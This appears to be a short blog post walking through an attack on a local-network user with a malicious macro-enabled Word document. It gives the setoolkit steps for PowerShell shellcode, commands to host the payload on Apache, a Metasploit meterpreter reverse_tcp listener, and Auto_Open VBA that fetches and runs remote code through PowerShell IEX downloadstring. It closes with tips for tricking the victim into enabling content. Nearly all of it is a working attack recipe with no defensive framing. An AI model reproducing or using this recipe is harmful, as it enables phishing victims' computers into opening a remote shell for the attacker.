MS Word Macro Exploit

1 minute read


The following is an article I read on generating an exploit for MS Word and using it to attack a LAN user.

What you will need:
Microsoft Word
The Social-Engineer Toolkit (preinstalled on Kali)
Apache web server (preinstalled on Kali)
The Metasploit Framework (also preinstalled on Kali)

To Resolve:

  1. Create the payload. On Kali, open terminal and type: setoolkit

  2. Type “1” then “9” then “1” for powershell alphanumeric shellcode injector”.

  3. Fill in the LHOST variable which is your IP. This attack assumes you are on the local subnet of your victim. Then fill out the LPORT which is the port you want the attack to come back on. People typically keep this at “4444” but you can choose whatever. Type “no” to the start listener now.

  4. Now move the payload to your web server:

    mv /root/.set/reports/powershell/x86\_powershell\_injection.txt /var/www/html/payload.txt  
    service apache2 start
  5. Now we setup the listener:

    use multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp  
    set LHOST  
    set LPORT 4444  
  6. Now we need to add the command to our MS Word document:

    • Open up a blank MS Word doc and name is something like attack.docm and make sure that it is macro-enabled.

    • Go to the “View” tab – Macros – “Auto_Open” / attack.docm – Create – (paste in the following:)

    Sub Auto_Open()  
    Dim exec As String  
    exec = "powershell.exe ""IEX ((new-object net.webclient).downloadstring(‘’))"""  
    Shell (exec)  
    End Sub  
    Sub AutoOpen()  
    End Sub  
    Sub Workbook_Open()
    • At this point, you may want to obfuscate the code, but many people don’t even know how to get to the macro’s section of Word, muchless what macro’s even are so we will skip this step. If you want to know, read the article in the reference (the source).

    • Save the document

  7. Now we need to convince the victim that the document is safe. The article references word trickery such as “to open the secure document, click “Enable Content””.